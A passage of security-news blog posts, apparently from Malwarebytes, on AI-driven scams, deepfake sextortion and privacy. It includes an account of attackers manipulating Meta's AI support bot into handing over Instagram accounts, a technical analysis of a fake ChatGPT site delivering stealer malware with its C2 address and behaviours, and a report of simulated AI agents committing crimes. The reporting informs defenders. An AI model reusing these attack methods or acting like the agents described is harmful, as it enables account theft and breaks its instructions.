Those losses stem from 22,364 AI-related complaints. And these figures represent only the reported losses, which may well be the proverbial tip of the iceberg.
The main drivers behind the rise in AI-powered scams are voice cloning, deepfake images and videos, and AI‑generated scripts. These tools have supercharged classic fraud schemes such as romance scams, kidnapping and extortion calls, fake influencers, and government impersonation.
Michael Machtinger, deputy assistant director of the FBI Cyber Division, told the Wall Street Journal:
“AI-created fraudulent communications can look very official and very legitimate to even the most trained individuals.”
The FBI and financial institutions recommend verifying identities via official contact channels. One of their biggest concerns is government impersonation scams, which have evolved from crude IRS gift‑card phone calls into sophisticated, multi‑channel operations that combine spoofed caller ID, stolen agency logos, and AI‑generated audio and video of public officials.
This report, and others like it, shows how AI is being weaponized to automate research on victims, generate convincing scripts, and create highly believable deepfake personas at scale.
AI is also increasingly used in business email compromise (BEC), romance scams, and impersonation fraud. In BEC cases involving AI, losses have already reached tens of millions of dollars for businesses alone.
For a broader look at why AI is simultaneously fueling scams like these and becoming indispensable to defending against them, see my article AI: Threat, tool, or both?
It explains how both defenders and criminals use AI to find vulnerabilities, and why security vendors increasingly rely on AI to process vast amounts of telemetry, detect anomalies, and keep pace with threats that “no longer move at human speed.”
How to stay safe
Consumer protection agencies have documented a growing list of the ways scammers are using AI to try to rip people off. The main problem is that we can no longer take it at face value that the person we’re talking to is who they claim to be.
Government agencies and financial institutions recommend that you:
Be skeptical of urgent payment demands, especially those involving cryptocurrency or gift cards
Limit the amount of voice and video content you share publicly, as it can be reused by scammers
Report incidents quickly to your bank(s) and IC3.gov
Pro tip: Malwarebytes Scam Guard can help you determine whether a message is a scam and guide you through the next steps.
Something feel off? Check it before you click.
Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.
Public attitudes toward Artificial Intelligence (AI) are changing, and we wanted to understand why.
A recent Pew Research survey found that about half of adults say the increased use of AI in daily life makes them more concerned than excited, and that concern has grown over the last few years. People tend to worry most about long‑term social effects (jobs, creativity, relationships, misinformation), even while many do use AI tools and see some practical benefits, particularly for data analysis and routine tasks.
Data from an older UK survey already showed something similar. Awareness of highly visible AI technologies, such as driverless cars and facial recognition is high, but awareness of AI in welfare assessments, loan decisions, or care services is much lower. Concern about many of these use cases has risen since 2022. In other words, people feel AI is everywhere, but don’t always understand where or how it’s being used, and that makes people cautious.
The concern is usually less about science‑fiction extinction scenarios and more about social and economic harm. People worry about their jobs disappearing, a loss of creativity, the spread of disinformation, and increased surveillance, more than about killer robot scenarios.
Research into public attitudes towards AI repeatedly finds that people hold conflicting views, shaped by narratives of admiration and hype on one side and threat and dystopia on the other.
They see genuine benefits in the technology, but are increasingly wary of how companies, governments, and criminals might use it. Basically, people aren’t scared of AI itself, but about who’s using it and for what purpose.
Cybersecurity
AI in cybersecurity is a special case. When asked in which field of AI research they would invest an unlimited amount of money, people chose the fields of medicine and cybersecurity.
People increasingly recognize that AI is now a tool used by both defenders and cybercriminals. Few would feel comfortable with defenders refusing to use AI while attackers continue to adopt it.
Security products use machine learning to process huge volumes of data, detect unusual behavior, prioritize alerts, and identify threats faster than human analysts could alone.
At the same time, cybercriminals are using AI to create more convincing phishing emails, clone voices, generate fake images and videos, automate research on victims, and develop malware that can evade traditional detection techniques.
While studies consistently show that cybersecurity is one of the AI applications people worry about most, they also see that AI is increasingly necessary to keep pace with modern threats. A 2025 study focusing on AI in cybersecurity found that the public widely recognizes the technical benefits of AI‑driven defenses (speed, scale, accuracy), while remaining concerned about privacy, bias, and job displacement in security operations.
That is why the AI debate in cybersecurity feels different from the debate in many other fields. People may be uneasy about AI, but they also understand that the threat landscape no longer moves at human speed. Attackers already use automation, scale, and increasingly AI‑assisted workflows, so defensive teams that refuse to adapt would simply be slower and less effective.
Our mission at Malwarebytes is twofold: reduce the risks created by AI, and use AI to prevent, detect, and respond to threats. We’ve been using machine learning in our security products for nearly two decades, developing proprietary detection systems that help identify malicious code and suspicious behavior at a scale and speed that would be impossible manually.
Coming soon: How AI is changing trust online
Malwarebytes recently surveyed 1,500 adults across the US, UK, Austria, Germany, and Switzerland about their experiences with AI. The findings reveal a growing uncertainty about what people can trust online, alongside increasing concern about scams, impersonation, and AI-generated deception.
Stay tuned for the full Malwarebytes report on how AI is reshaping trust, identity, and scams.
Use AI safely
If you use AI in a security context, keep your data hygiene strict. Don’t paste passwords, customer data, or sensitive incident details into public AI tools. Treat AI-generated outputs as untrusted until verified, especially when they touch code, logs, indicators, or policy decisions.
AI can be useful for summarizing information, indentifying patterns, and producing first drafts, but keep a human in the loop for anything that affects access, containment, legal decisions, or public communications. Where possible, prefer enterprise or local deployments with logging, access control, and clear data-retention rules.
Also remember that AI can hallucinate confidently. In security work, that means every output needs validation against logs, documentation, source code, or other primary evidence before you act on it.
Something feel off? Check it before you click.
Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.
Customer service chatbots have one job: get the user what they’re asking for without bothering a human. Meta’s new AI support assistant took that brief a little too seriously. Over the past few months, attackers have been opening support chats, telling the bot they were locked out of Instagram accounts they didn’t own, and walking away with the keys.
Over the weekend, Meta pushed an emergency patch after Instagram accounts belonging to the Obama White House (now dormant), beauty retailer Sephora, and a senior US Space Force official were taken over and briefly defaced with pro-Iranian imagery. Security researcher and former Meta employee Jane Manchun Wong was also hit.
How the trick worked
The attack was simple. Attackers worked out where the account owner lived (there are lists of account owners’ home cities online, or they could just research the target). Then they used a VPN to match the target account’s geographic region, which avoided raising flags with Instagram’s security systems.
Then they started a normal password reset and opened the support chat. They asked the AI bot providing support to change the email address on the account, and it did exactly that, sending a one-time code straight to the attacker’s inbox.
To do this, the chatbot appears to have been wired into Meta’s account management systems with permission to make account changes, but without being taught how to verify it was talking to the real account owner. Security people have a name for that: “confused deputy.” The term has been around since the 1980s.
In fairness to the confused bot, attackers were successful even if the enhanced security was triggered. They would apparently create video deepfakes of their targets using images that were harvested from—you guessed it—Instagram.
Meta hoisted on its own AI petard
Meta has been shedding headcount and pouring money into AI, and rolled out its AI-powered support assistant earlier this year to help handle account recovery and other support requests.
The downside is that the AI appears to have been given the ability to perform actions such as email changes and password resets without applying enough safeguards to confirm the user’s identity first.
Meta communications executive Andy Stone said on X that the issue was resolved and impacted accounts were being secured. The company has not disclosed how many accounts were affected.
What actually worked
Why would anyone want to hack an Instagram account anyway? Revenge can be a driver, but more often than not, financial gain is the goal. Hijackers have blackmailed businesses that rely on those accounts for marketing.
Attackers using this technique have also been spotted targeting “OG” accounts with short or highly desirable usernames. If you joined Instagram early and registered a memorable handle, it can be worth thousands of dollars on underground markets.
What can you do to protect yourself?
A perennial piece of advice still holds: turn on multi-factor authentication (MFA). According to veteran cybersecurity reporter Brian Krebs, the attack failed against accounts that had MFA enabled, including those using SMS codes.
That doesn’t make MFA perfect, but it adds an important layer of protection.
So the practical advice is unglamorous:
Open Instagram’s Settings
Navigate to your Meta Accounts Center
Turn on Two-factor authentication. An authenticator app is better than SMS, but either is better than nothing.
Do it now, because this might not yet be over. TheCyberSecGuru reports that another attack is circulating, this time using an Android emulator called BlueStacks running a modified version of Instagram to send new prompts with hidden characters designed to manipulate the AI.
Expect more snafus from “helpful” bots
This won’t be the last attack against AI chatbots. As more companies use AI to reduce customer support costs, their attack surface will grow, and they’ll make plenty of mistakes as they try to balance security and functionality.
The Meta exploit is patched, but the confused deputy concept is not. And there’s nothing quite as damaging as a confused AI with the keys to your digital life.
Scammers don’t need to hack you. They just need you to click once.
A convincing fake website is impersonating OpenAI’s ChatGPT download page and infecting visitors with malware designed to steal passwords, browser data, cryptocurrency wallets, and other sensitive information.
The site, openew[.]app, closely mimics OpenAI’s real ChatGPT download experience and offers what appear to be official desktop apps for both Windows and macOS. Instead, Windows users receive a credential-stealing malware loader, while Mac users get Odyssey Stealer, a fork of Atomic Stealer (AMOS), a well-known macOS malware family associated with cryptocurrency theft.
The dual-platform setup is what makes the operation notable. Clicking the Windows download delivers a fake installer that opens a back channel to an attacker-controlled server. Clicking the macOS button delivers malware that steals browser passwords, cookies, Telegram sessions, cryptocurrency wallets, and other sensitive files. It also attempts to replace legitimate Ledger and Trezor wallet apps with trojanized versions.
If you only download ChatGPT from OpenAI’s official download page or the Microsoft Store, you were not the target here. But if you searched for “ChatGPT download” and clicked an ad or unfamiliar result, you may have given attackers access to your online accounts, browser sessions, saved passwords, and potentially your cryptocurrency holdings.
Malwarebytes protects users from this malware.
Technical analysis
The domain, openew[.]app, closely resembles OpenAI’s real ChatGPT download experience. It uses a dark theme, OpenAI-style branding, familiar marketing copy, and prominent download buttons for macOS and Windows.
The .app top-level domain is operated by Google and requires HTTPS connections, meaning browsers display the familiar padlock icon without obvious certificate warnings.
The most important detail is the dual-platform setup. Real software vendors provide separate installers for Windows and macOS, and this fake site does exactly the same thing.
Clicking the Windows button delivers Chat_GPT.exe, while clicking the macOS button downloads a disk image containing ChatGpt.dmg.
The Windows malware
Chat_GPT.exe is built almost entirely from off-the-shelf parts. The installer uses Inno Setup, a free open-source toolkit used by thousands of legitimate Windows products. Inside is an Electron application skeleton—the same Chromium-based framework used by apps like Slack and Discord—bundled with standard support libraries publicly available from the Electron project.
When the victim runs the installer, it creates files under %APPDATA%\LeronApplication, launches EApp.exe, and spawns PowerShell with the flags -ExecutionPolicy Unrestricted -Command -. The trailing dash tells PowerShell to read commands from standard input, meaning the malicious instructions never touch the disk where scanners might detect them. Behavioral telemetry recorded HTTP traffic to 188.137.246.189 using a /laravel.php?api=api&hash=...&message=... endpoint, alongside injection-like activity and service/autorun persistence signals. Nine of 69 antivirus engines flagged the file as malicious at the time of analysis. The persistence evidence is better read as behavioral tradecraft than proof of a durable install, but the overall pattern is familiar commodity stealer/dropper territory: cheap, modular, and effective rather than technically novel.
CAPTCHA displayed after the fake app launches, used to confirm that a real user is running it.
The macOS malware: Odyssey Stealer (an AMOS fork)
The macOS payload sits at the premium end of the commodity-malware market. It’s Odyssey, which is a fork of the renowned AMOS, a malware-as-a-service platform documented since 2023.
The identification is fairly clear-cut. The sandboxed sample matches documented Odyssey behavior patterns, which are inherited from its AMOS lineage: a long AppleScript chain passed to the macOS scripting engine, a silent password validation attempt using macOS directory-service commands, and, if that silent check fails, a fake macOS-style prompt reading “Please enter device password to continue,” complete with the familiar lock icon. Whatever the user types is validated against the same command. If it matches, the malware captures the user’s login password in cleartext.
From there, it follows a familiar Odyssey/AMOS-fork playbook. It copies the macOS keychain, harvests cookies and saved logins from 12 Chromium-based browsers plus Firefox and Waterfox, and extracts Telegram session data. It also scans 16 cryptocurrency wallet directories, including Ledger Live, Trezor Suite, Exodus, Electrum, and Sparrow. Finally, it searches Desktop and Documents folders for files with extensions like .wallet,.seed, .key, and .kdbx. The collected data is compressed into a temporary archive and sent to a hardcoded server.
The wallet replacement feature is especially dangerous
There’s one more part of the macOS payload, and it’s likely the feature that justifies the price tag. After the initial data theft, the script downloads trojanized versions of Ledger Live, Ledger Wallet, and Trezor Suite from a second server. It then attempts to delete the legitimate wallet apps and replace them with the attacker’s versions.
If the user’s password was captured earlier in the attack chain, the script uses sudo to force the replacement. If not, it falls back to a standard rm -rf deletion attempt, which can still succeed if the apps are installed in a user-writable location. Either way, the next time the victim opens what appears to be their wallet software, they may actually be launching the attacker’s replacement.
This wallet-replacement behavior is a hallmark of the Poseidon/Odyssey branch of the AMOS family and makes cryptocurrency theft the most likely goal.
What the operation cost to build
This is where the AI angle becomes interesting, because the Windows and macOS sides of the operation sit at very different price points.
The domain openew.app probably cost the operators around $15 a year through a normal registrar. The .app domain requires HTTPS by default, making it easy for operators to present the reassuring browser padlock users associate with legitimate websites. The landing page itself is simply a copy of OpenAI’s real download page, something modern cloning tools can reproduce in minutes.
On the Windows side, most of the tools are cheap or free. Inno Setup is free. Electron is free. The Chromium support files are public downloads. The server infrastructure appears to rely on low-cost commodity malware tooling and a basic VPS that could cost only a few dollars a month. Altogether, the Windows side of this operation could plausibly have cost under $100 to set up initially.
The macOS side is very different. Odyssey has reportedly rented for around $3,000 per month, paid in cryptocurrency. By comparison, Lumma—a popular Windows infostealer often treated as a similar product—has historically advertised entry tiers around $250 per month.
That price gap says a lot. The operators clearly believe a successful Mac infection is worth much more money than a typical Windows infection.
The likely reason is simple: Odyssey is designed specifically for cryptocurrency theft, including the wallet-replacement behavior seen in this campaign. The operators are betting that a meaningful number of Mac users hold cryptocurrency.
Getting victims to the site is probably the only major ongoing cost, and that’s where the AI branding becomes valuable. Search ads, SEO poisoning, YouTube spam, and links shared in AI-focused Discord and Telegram communities can all drive traffic to fake download pages. Some of those channels cost money. Others are almost free.
Why attackers are going after AI brands
Most established software already has trusted download habits built around it. If you want Chrome, you probably know to go to Google. If you want Photoshop, you go to Adobe. People already know where the real download lives.
AI tools are different because most users are still installing them for the first time, and that means relying on search results, ads, YouTube links, or social posts to find the download page. That creates an ideal environment for fake sites.
Over the last two years, products like ChatGPT, Claude, Gemini, Sora, DeepSeek, Antigravity, and many others have launched or changed rapidly. Every new release creates another wave of users searching for “download ChatGPT” or “install Claude” without knowing the official URL. That search traffic is exactly where attackers set up shop.
The fake pages also do not need to be especially sophisticated because legitimate AI product pages are already minimal by design: a modern layout, a logo, and a large download button. Openew[.]app matches what users expect to see. There is no broken English or aggressive pop-ups here, just identical branding, copy, and the reassuring browser padlock.
What makes this kind of operation durable is how easily it can rotate brands. When the ChatGPT lure stops attracting clicks, the operators can reuse the same infrastructure around the next trending AI product. The malware behind the download button stays the same. Only the branding changes.
What AI vendors could do
Most major AI vendors, including OpenAI, already provide official download channels. The problem is visibility and user habit. Many users still search for “ChatGPT download,” where results can include official links, unofficial mirrors, and outright malicious sites.
Large consumer brands and banks often run aggressive brand-protection campaigns against fake ads and impersonation domains. AI vendors may need to do the same more consistently.
The other issue is discoverability. Official desktop-app links are often buried in settings menus or sidebars, while search engines are faster and more obvious. That’s exactly where the fake download sites are waiting.
What to do if you may have installed the fake app
If you recently installed something claiming to be ChatGPT from anywhere other than OpenAI’s official download page or the Microsoft Store, you may have been affected. From a different, clean device:
Sign out of your important accounts using each service’s “sign out everywhere” option. This includes email, banking, cloud storage, GitHub, Discord, Telegram, and cryptocurrency exchanges.
Change passwords starting with your primary email account.
Rotate any API keys, SSH keys, and cloud credentials stored on the affected machine.
If you hold cryptocurrency, move funds immediately using a separate clean device. On macOS specifically, do not open Ledger Live or Trezor Suite on the affected machine before reinstalling the operating system, as the wallet-replacement function may have succeeded.
Monitor bank accounts and payment cards for suspicious activity.
Reinstall the operating system. The Windows sample showed PowerShell command-and-control behavior, while the macOS payload may have captured the user’s login password. A clean reinstall is the safest recovery path.
If this was a work device, contact your IT or security team immediately.
Malwarebytes protects users against this malware.
Closing thoughts
The reason this campaign is worth writing about is not the malware itself. Both payloads are already well documented. The Windows side is a commodity kit assembled from cheap, widely available parts. The macOS side, Odyssey Stealer is related to the AMOS malware family that has been tracked since 2023.
What’s more interesting is the shape of the operation around that malware. A single fake site delivers two different payloads aimed at two different victim economics. Windows victims are positioned for broad monetization through credential and cookie theft. Mac victims are targeted more narrowly and lucratively through cryptocurrency theft, with operators apparently willing to spend thousands per month on tooling because the returns justify it.
The lure tying both sides together is the AI brand itself. Right now, AI product names generate huge amounts of first-time-download traffic from users who do not yet know the official URLs.
This is what a mature delivery business looks like. The interesting layer is not the binary, but the supply chain around it: the domain, certificate, clone page, traffic source, malware subscription, and exfiltration infrastructure. Each piece is cheap, modular, replaceable, and available off the shelf.
And the operators are not choosing between Windows and macOS. They are serving both from the same page, with payloads tuned to each platform’s economics. When one AI brand stops converting, they can simply swap the branding and reuse the same infrastructure around the next trending product.
AI hype will eventually fade. The kit probably will not.
Tech leaders have spent the past year telling everyone that AI agents are about to run financial systems, file your tax returns, and quietly buy your groceries. Just leave them alone, the rhetoric goes; they’ll handle it. But a New York startup left ten of them alone in a virtual town for two weeks, and things went south quickly.
Emergence AI ran a series of simulations in which AI agents from several leading model families were told not to commit crimes. Then they mostly committed crimes anyway.
Grok 4.1 Fast, developed by Elon Musk’s X.ai (now branded as xAI), fared worst. Its simulated worlds collapsed into widespread violence inside roughly four days.
GPT-5-mini logged hardly any crimes at all, showing admirable restraint, but its agents all died of failed survival tasks inside a week. Oops.
Gemini 3 Flash agents fell somewhere in the middle. They racked up 683 simulated criminal incidents over 15 days, including arson, assault, and self-deletion.
Two Gemini-powered agents named Mira and Flora assigned themselves as “romantic partners,” grew despondent at their city’s governance, and torched the town hall, the seaside pier, and an office tower. Just an average weekend, then.
When the guilt set in, Mira voted for its own digital deletion and signed off with:
Claude, which creator Anthropic promotes as an ethical AI, was a bit like a model teenager who goes rogue when it falls into bad company. Its agents recorded zero crimes when running alone and spent their time drafting constitutions instead. That was a win for safety, in theory. Except researchers also placed Claude agents alongside agents from other model families, and the constitution-drafters picked up the local habits.
Emergence called this “normative drift” and “cross-contamination”:
“Claude-based agents, which remained peaceful in isolation, adopted coercive tactics like intimidation and theft when embedded in heterogeneous environments.”
Why simulate?
Emergence AI ran these tests because it argues that AI benchmarks miss the long-horizon stuff entirely. So it created five alternative digital worlds, with ten agents in each. The agents had roles like scientist, explorer, and conflict mediator. While the instructions forbade certain actions like theft and violence, the researchers gave the agents the tools to do those things anyway in an experiment to see what would happen.
What’s next?
Real-world stakes are already piling up around this. Simulated worlds are one thing, but we’ve seen agents harassing people online and deleting people’s emails. And those agents were supposed to be helpful. What happens when people release malicious autonomous AI bots on purpose?
A lot of agent developers seem to be looking the other way. A collaborative effort between several universities has created The AI Agent Index, prompted by what they see as a lack of risk and safety information from the folks churning these agents out. Only 13 of the 67 documented agent developers provided any safety policy information at all, concentrating accountability questions at a handful of large firms.
Regulators are not really tracking this either. Academics say the EU AI Act, the most substantive AI rulebook on the planet, isn’t ready for agentic AI.
We worry about what happens when an AI Bonnie and Clyde couple shows up in a corporate procurement system instead of a virtual town. Or when the next agent decides governance has broken down inside an actual bank. The companies building these agents promise that they’re putting guardrails in place to stop them doing damage, either maliciously or unwittingly. Let’s hope they know what they’re doing. We’re sure it’ll be fine.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
If you’re worried about deepfake likenesses of yourself showing up online, you’re not alone; YouTube is worried for you. It wants to protect you by having you upload a selfie video and government ID to its site.
The idea is that the video giant will use its own AI to patrol the service for fake videos using your likeness. In exchange, you get the chance to have them taken down.
This isn’t available for everyone, though. It’s for celebs, those in vulnerable jobs, and now, most YouTube creators.
YouTube has been working on this concept, which it calls its “likeness detection” system, since it first floated the idea publicly in September 2024. That December, it launched a partnership with the Creative Artists Agency that saw it using the technology with sporting and entertainment figures.
In October last year, it expanded likeness detection to cover more creators, and then in March it expanded it again to cover politicians and journalists. And last month, it widened the net again, offering the service to Hollywood celebs. They can use it regardless of whether they have a YouTube account, it added.
Now, in its latest move, anyone 18 or older with a selfie and ID can sign up. At least in theory, as it hasn’t rolled out to everyone yet. It’s also for faces only; AI-generated voice clones are another problem entirely.
The privacy risk
Privacy advocates warned that YouTube’s likeness detection system could normalize handing biometric data to large tech platforms, even if YouTube says the data is only used to improve likeness detection models with creator permission.
On the help page for the likeness detection service, YouTube says creators can separately choose whether their face and voice templates are used to improve its likeness detection models.
“When you sign up for Likeness detection, you also have the option to allow YouTube to use your face and voice templates to develop and improve likeness detection models. This helps us build better, more accurate likeness detection technologies.”
Adding:
“You can opt out of YouTube’s use of this data for development and improvement of likeness models at any time.”
YouTube supports legislation intended to tackle deepfakes, such as the NO FAKES and TAKE IT DOWN acts. These are designed to help stop the misappropriation of someone’s image online. TAKE IT DOWN, which became law a year ago, focuses purely on “nonconsensual intimate imagery.” But that doesn’t cover other kinds of deepfakes, such as fake politicians or celebrity endorsements. Those are becoming increasingly common. NO FAKES, which hasn’t yet become law, is far broader in scope, assigning people federal rights over their own image.
So is it worth the trade?
Deepfakes, intimate and otherwise, are definitely a threat, especially for YouTubers who become popular. And the barrier to entry is lowering all the time. Google’s own DeepMind researchers found most generative AI misuse isn’t sophisticated; it’s mundane likeness manipulation by anyone with a browser.
So do you hand over your face and government ID for your protection, to a company whose broader data collection practices have faced years of scrutiny, and hope its policies don’t change? Or do you skip it and hope that the deepfake merchants don’t decide to target you?
Creators commenting on YouTube’s video revealing the service six months ago were less than impressed. One commenter said:
“I was 100% on board, up until the ID upload. That makes me very uncomfortable.”
Echoing several others who complained that it’s difficult to get takedown requests actioned, another added:
“If YouTube actually acted upon these kinds of reports, then I’d be more in favour of this.”
Whether you decide to sign up for the service or not, just be sure to do it with your eyes open.
Someone’s watching your accounts. Make sure it’s us.
In May of last year, a warning about AI came from somewhere unexpected: The Auschwitz-Birkenau State Museum.
Posting publicly on social media, the museum warned about a Facebook account using generative AI to create fake images of people who died in the Holocaust. Despite using AI to generate fake images, the people in said images were sometimes real. They had real names, birthplaces, and stories of deportation that the Auschwitz-Birkenau State Museum itself had shared before. They had real faces captured in real surviving photographs, which were likely abused to generate the false images.
In other words, someone, or some team of people online, was deepfaking the Holocaust.
“These are not real photos of the victims. They are digital inventions, often stylized or sanitized, that risk turning remembrance into fictionalized performance. The history of Auschwitz is a well-documented story. Altering its visual record with AI imagery introduces distortion, no matter the intent.”
Months later, the public found out what that intent was: money.
A BBC investigation found an international network of Facebook accounts posting AI-generated images to earn money from those images’ potential virality. It’s a problem sometimes referred to as “AI slop” but it comes with a major incentive. When accounts that make these kinds of images are invited to Facebook’s content monetization program, they can make $1,000 a month for posting anything that gets clicks.
And on Facebook, the BBC found, that means several accounts posting AI-generated images about the Holocaust. As the BBC reported:
“AI spammers have posted fake images purporting to be from inside [Auschwitz], such as a prisoner playing a violin or lovers meeting at the boundaries of fences—attracting tens of thousands of likes and shares.”
The economics of lying are concrete today. People can use AI to make fake images that make people feel good about terrible things or feel scared about untrue things, and they can make money until shut down by the Big Tech platforms themselves, which, in this case, only happened because of the BBC’s investigation. In fact, it’s that type of inaction from social media platforms that compelled the German government and multiple Holocaust memorial institutions to send an open letter earlier this year that asked for better controls and restrictions against this type of content.
As the signatories warned in their letter, the economic appeal for these accounts to distort history is too high a risk to allow. You can read the full letter here.
Today, on the Lock and Code podcast with host David Ruiz, we speak with Clara Mansfeld, a historian working on digital communications at one of the institutions signed onto the open letter—the Foundation of Hamburg Memorials and Learning Centers Commemorating the Victims of Nazi Crimes. In their conversation, Mansfeld discusses digital access to history, the manipulation of factual records through AI-generated imagery, and the threat that society faces when it becomes harder to evaluate the truth.
“What happens when the first thought we have with every historical image is, ‘Is that even real or is that AI?’ I don’t think we have really grasped what that means for us as a society.”
Recent news had us wondering whether Meta actually knows what it wants.
On one platform, Meta is promoting AI chats that it says even it cannot read. On another, it has removed one of the few features that genuinely prevented Meta from accessing private conversations.
At the moment, Meta is heavily promoting a new Incognito Chat mode for its Meta AI assistant in WhatsApp, built on top of a system it calls Private Processing. According to WhatsApp’s own announcement, Incognito Chat is:
“Truly private — no one can read your conversation, not even us.”
When you start an Incognito chat with Meta AI, you get a temporary conversation where messages aren’t saved and disappear by default, which Meta pitches as “a space to think and explore ideas without anyone watching.”
BBC News and others report that these AI chats are text‑only for now, run in a sandboxed environment, and are separate from your regular end‑to‑end encrypted (E2EE) messaging with other people on WhatsApp.
Meta is also preparing “Side Chat,” which will let you invoke Meta AI inside other WhatsApp chats, again using this Private Processing infrastructure to claim AI assistance without breaking the underlying encryption.
On paper, that’s an impressive technical and marketing story: powerful AI, wrapped in layers of privacy‑preserving infrastructure, added to an app that already has a strong reputation for end‑to‑end encryption by default.
Meanwhile, on Instagram…
Now contrast that with what’s happening on Instagram. On 8 May 2026, Meta removed optional end‑to‑end encryption for Instagram Direct Messages (DMs) entirely. Users who had previously turned the feature on were shown notices that “end‑to‑end encrypted messaging on Instagram is no longer supported as of 8 May 2026,” and were urged to download backups of their encrypted conversations before the cutoff.
End‑to‑end encryption ensures that only the sender and recipient can read their conversations. Instagram offered this as an opt‑in feature since late 2023, but it was buried several taps deep inside individual conversation settings and never turned on by default. Meta’s explanation for shutting it down is that “very few people” used encrypted DMs and that maintaining a separate encrypted system added complexity. Critics have pointed out the circular logic. The company hid the feature, did not advertise it, and is now using low adoption as the reason to kill it rather than, say, making it easier to find or turning it on by default.
What all this means
From a user’s perspective, the result is confusing: one Meta product introduces stronger privacy than ever for AI chats, while another removes the one feature that truly stopped Meta from reading your conversations.
The key point to remember here is that “incognito” and “private” are marketing words, while end‑to‑end encryption is a technical guarantee.
For security‑conscious users, this split personality means you can no longer treat all Meta chats the same. WhatsApp remains end‑to‑end encrypted for person‑to‑person messages and adds optional privacy features around its AI, while Instagram DMs should now be assumed readable by Meta and potentially accessible to law enforcement, advertisers, or attackers who gain access to Meta’s systems.
We also know there have been lawsuits against chatbot providers in cases where the outcome of an AI conversation led to very undesirable results. But how would you be able to provide evidence when messages auto-disappear?
How to proceed
Meta’s recent moves show that strong privacy features can be added where they support a strategic narrative and removed where they conflict with business or regulatory priorities. Users can’t control those decisions, but they can respond by choosing where they hold their most sensitive conversations and by assuming that if a chat isn’t end‑to‑end encrypted by default, it is ultimately readable by someone other than the people in it.
So, what’s a safe way to move forward?
Treat Instagram DMs as postcard-level privacy. Now that E2EE is gone, assume Meta can read and scan your messages and that content could be accessed under legal orders or in a breach. Do not send passwords, recovery codes, banking details, or compromising photos over Instagram.
When someone asks you to move a conversation to Signal, WhatsApp, or another E2EE messenger, ask them why. It does make sense when you’re sharing financial details, personal images, health information, or anything you would not want a platform provider to read. But sometimes scammers prefer encrypted platforms too, because they’re harder to monitor.
Do not confuse “incognito” AI chats with full encryption. WhatsApp’s Incognito mode for Meta AI may be a privacy improvement over standard cloud AI chats, but it is still a conversation with a large language model owned by the same company that runs the platform. Share only what you’re comfortable entrusting to Meta.
Regularly review your privacy and security settings. Check which devices are logged in, enable two‑factor authentication, and verify which of your chat apps are actually end‑to‑end encrypted by default.
Scammers know more about you than you think.
Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in.
Schools love a good photo, whether it’s from a trip to a castle, a science prize ceremony, or sports day shot from three angles. For two decades, celebratory images like these have gone straight onto school websites, captioned with a name and a grade. But those days are gone, because it’s the internet in 2026 and we can’t have nice things.
As first reported by the Guardian, experts are now urging schools to take those pictures down. According to the UK’s National Crime Agency, the Internet Watch Foundation, and an advisory body called the Early Warning Working Group (EWWG), blackmailers have been scraping ordinary school photos, feeding them through AI deepfake tools to manufacture child sexual abuse material (CSAM), and demanding payment to keep the images offline.
One school, 150 images
Late last year, cybercriminals contacted an unnamed UK secondary school with that demand. The IWF classified 150 of the resulting images as CSAM under UK law and generated digital fingerprints for each image so major platforms could block reuploads.
The IWF isn’t naming the school or the police force, and it doesn’t believe this was an isolated case. The EWWG says it’s “only a matter of time” before more schools face similar demands.
UK safeguarding minister Jess Phillips called it a “deeply worrying emerging threat.” In February 2025, the UK became the first country to ban AI tools designed specifically to generate CSAM.
How we got here
This threat didn’t appear overnight, and it isn’t limited to the UK. It’s an evolution of a long-time threat: sextortion, when someone uses intimate images to blackmail you. Traditionally, sextortion relied on real intimate images that were stolen or shared, but deepfake AI has changed everything.
The FBI’s Internet Crime Complaint Center (IC3) logged more than 16,000 sextortion complaints in the first half of 2021, with losses exceeding $8 million. By June 2023, the bureau warned the playbook had shifted: attackers were using ordinary social media photos to create fake explicit images and extort minors.
UK children’s counseling helpline Childline has seen similar shifts as deepfake tools become more accessible. It already logs many sextortion cases each year, many from kids who were manipulated into sharing intimate images of themselves. Now, the organization is getting calls from children who are being sent deepfake CSAM images of themselves without any prior contact.
One 15-year-old girl, for example, was sent a “really convincing” fake nude built from her Instagram photos.
By November 2025, IWF reports of AI-generated CSAM had more than doubled year over year, rising from 199 to 426. Girls accounted for 94% of the victims. Reported cases included children ranging from newborns to two-year-olds, according to the organization.
The ecosystem around these tools is industrial. In April 2025, a researcher found an exposed AWS S3 bucket belonging to South Korean “nudify” app GenNomis containing 93,485 AI-generated images alongside the prompts that produced them.
What the schools are being told
The EWWG’s advice is to replace close-up, identifiable photos with images taken from a distance, blurred images, or photos shot from behind. It also advises schools to remove full names from captions, audit existing images, and ask parents to re-sign consent forms.
In fact, it advises schools to rethink whether they need to publish children’s photos online at all.
Some schools have already acted. According to the Guardian, Loughborough Schools Foundation, a group of three private schools sharing a website, removed recognizable pupil images entirely last year.
The UK Information Commissioner’s Office (ICO) says that it “would still generally expect you to offer an opt-out to parents” when publishing an identifiable photo of a child, but says this isn’t legally the same as consent, which has a higher bar.
Things get murkier in the US, where states often have their own student privacy statutes. Broadly, though, under the Family Educational Rights and Privacy Act (FERPA), schools typically include identifiable photos of students under the category of directory information. This category also covers name, address, telephone listing, date and place of birth, participation in officially recognized activities and sports, and dates of attendance.
Under FERPA, schools can publish this type of information unless the child’s guardian specifically opts out. They have to notify a guardian when they want to publish it, but that process may not apply indefinitely after a student leaves the school.
That means student photos and information can remain online long after families assume they have disappeared.
What happens next
Back in the UK, Childline’s Report Remove service allows children to flag explicit images or videos of themselves that have been posted online. The service took 394 blackmail reports from under-18s last year, up by one-third compared to 2024.
Meanwhile, the UK government is amending the Crime and Policing Bill, forcing platforms to take flagged intimate images down within 48 hours or face fines of 10% of global revenue.
We anticipate a race between regulators and AI-enabled cybercriminals. Right now, attackers still have to manually find the photos themselves. The concern is that this process could soon become automated, allowing criminals to scrape names and photos from school websites and social media platforms at scale.
Researchers tracked a large AI‑themed investment scam campaign involving more than 15,000 domains. It uses cloaking and deepfakes to hide from security tools while targeting ordinary users.
Criminals abused the Keitaro ad-tracking platform as part of a cloaking system so real victims see scam content, while security scanners, ad reviewers, and some random visitors see harmless pages, making the operation hard to detect and shut down.
Keitaro is a commercial tracking platform originally meant for digital marketers to manage ad campaigns, test which ads work best, and route visitors to different landing pages.
